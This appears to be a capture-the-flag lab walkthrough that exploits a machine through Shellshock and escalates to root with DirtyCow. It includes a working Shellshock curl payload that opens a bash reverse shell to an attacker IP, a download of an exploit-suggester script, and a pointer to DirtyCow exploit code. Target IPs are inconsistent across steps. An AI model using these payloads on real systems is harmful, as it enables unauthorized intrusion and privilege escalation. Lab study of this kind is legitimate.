SummaryThis machine is exploited by the ShellShock vulnerability. It is escalated via the DirtyCow local root exploit.Enumeration
kali@kali:~/sumo$ nikto -h http://192.168.54.87 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.54.87 + Target Hostname: 192.168.54.87 + Target Port: 80 + Start Time: 2021-09-20 15:23:00 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.2.22 (Ubuntu) + Server may leak inodes via ETags, header found with file /, inode: 1706318, size: 177, mtime: Mon May 11 13:55:10 2020 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html + Allowed HTTP Methods: POST, OPTIONS, GET, HEAD + Uncommon header '93e4r0-cve-2014-6271' found, with contents: true + OSVDB-112004: /cgi-bin/test: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + OSVDB-112004: /cgi-bin/test.sh: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + OSVDB-3092: /cgi-bin/test/test.cgi: This might be interesting... + OSVDB-3233: /icons/README: Apache default file found. + 8725 requests: 0 error(s) and 13 item(s) reported on remote host + End Time: 2021-09-20 15:23:09 (GMT-4) (9 seconds) --------------------------------------------------------------------------- + 1 host(s) tested kali@kali:~/sumo$ Two ports open so we're going to hit the web port with Nikto:
Keeping things simple, let’s just see if this is really vulnerable:
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://192.168.86.150/cgi-bin/test/test.cgi
Excellent! We execute ID and we get a response. Now let’s see if we can get a shell:
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.86.99/443 0>&1' http://192.168.86.150/cgi-bin/test/test.cgi
With our handler setup:
Excellent! We catch our shell and we clean up the environment. Now let’s see what we’re dealing with:
gcc error ,We can fix that error with the following:
PATH=PATH$:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/gcc/x86_64-linux-gnu/4.8/;export PATH
Let’s also try :
https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
www-data@ubuntu:/tmp$ wget http://192.168.49.54/linux-exploit-suggester.sh wget http://192.168.49.54/linux-exploit-suggester.sh --2021-09-21 02:32:30-- http://192.168.49.54/linux-exploit-suggester.sh Connecting to 192.168.49.54:80... connected. HTTP request sent, awaiting response... 200 OK Length: 88891 (87K) [text/x-sh] Saving to: `linux-exploit-suggester.sh' 0K .......... .......... .......... .......... .......... 57% 227K 0s 50K .......... .......... .......... ...... 100% 2.58M=0.2s 2021-09-21 02:32:31 (371 KB/s) - `linux-exploit-suggester.sh' saved [88891/88891] www-data@ubuntu:/tmp$ chmod +x linux-exploit-suggester.sh chmod +x linux-exploit-suggester.sh www-data@ubuntu:/tmp$ ./linux-exploit-suggester.sh ./linux-exploit-suggester.sh Available information: Kernel version: 3.2.0 Architecture: x86_64 Distribution: ubuntu Distribution version: 12.04 Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed Package listing: from current OS Searching among: 78 kernel space exploits 48 user space exploits Possible Exploits: cat: write error: Broken pipe [+] [CVE-2016-5195] dirtycow Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails Exposure: highly probable Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ] Download URL: https://www.exploit-db.com/download/40611 Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh [+] [CVE-2016-5195] dirtycow 2 Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails Exposure: highly probable Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic} Download URL: https://www.exploit-db.com/download/40839 ext-url: https://www.exploit-db.com/download/40847 Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh [+] [CVE-2013-2094] perf_swevent Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/ Exposure: highly probable Tags: RHEL=6,[ ubuntu=12.04{kernel:3.2.0-(23|29)-generic} ],fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},debian=7{kernel:3.2.0-4-amd64} Download URL: https://www.exploit-db.com/download/26131 Comments: No SMEP/SMAP bypass [+] [CVE-2013-2094] perf_swevent 2 Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/ Exposure: highly probable Tags: [ ubuntu=12.04{kernel:3.(2|5).0-(23|29)-generic} ] Download URL: https://cyseclabs.com/exploits/vnik_v1.c Comments: No SMEP/SMAP bypass --snip-- [+] [CVE-2012-0809] death_star (sudo) Details: http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt Exposure: less probable Tags: fedora=16 Download URL: https://www.exploit-db.com/download/18436 www-data@ubuntu:/tmp$
and yes we use dirty
https://github.com/FireFart/dirtycow/blob/master/dirty.c
.